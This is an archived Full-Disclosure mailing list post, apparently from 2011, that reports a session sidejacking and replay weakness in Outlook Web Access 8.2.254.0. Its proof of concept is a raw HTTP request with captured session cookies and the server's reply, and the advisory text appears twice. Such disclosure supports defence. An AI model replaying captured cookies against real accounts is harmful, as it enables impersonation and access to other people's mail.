[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability
- From: information security <informationhacker08@xxxxxxxxx>
- Date: Tue, 25 Oct 2011 23:56:07 +0530
==============================================================================
Microsoft Outlook Web Access Session
sidejacking/Session Replay Vulnerability
===============================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@xxxxxxxxx
# Credit by Asheesh Anaconda
#Date 25th Oct 2011
#Product Outlook Web Access 8.2.254.0
#Vulnerability
SideJacking is the process of sniffing web cookies, then replaying them to
clone another user's web session. Using a cloned web session, the jacker can
exploit the victim's previously-established site access
#Impact
This allows attackers that can read the network traffic to intercept all the
data that is submitted to the server or web pages viewed by the client.
Since this data includes the session cookie, it allows him to impersonate
the victim, even if the password itself is not compromised.
#Proof of concept
========================================================================================================================
Request
========================================================================================================================
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://xxxwebmail.xxx.xxx/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT
#If you have any questions, comments, or concerns, feel free to contact me.
==============================================================================
Microsoft Outlook Web Access Session sidejacking/Session
Replay Vulnerability
===============================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@xxxxxxxxx
# Credit by Asheesh Anaconda
#Date 25th Oct 2011
#Product Outlook Web Access 8.2.254.0
#Vulnerability
SideJacking is the process of sniffing web cookies, then replaying them to
clone another user's web session. Using a cloned web session, the jacker can
exploit the victim's previously-established site access
#Impact
This allows attackers that can read the network traffic to intercept all the
data that is submitted to the server or web pages viewed by the client. Since
this data includes the session cookie, it allows him to impersonate the victim,
even if the password itself is not compromised.
#Proof of concept
========================================================================================================================
Request
========================================================================================================================
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt, */*
Referer: https://xxxwebmail.xxx.xxx/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729;
FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT
#If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/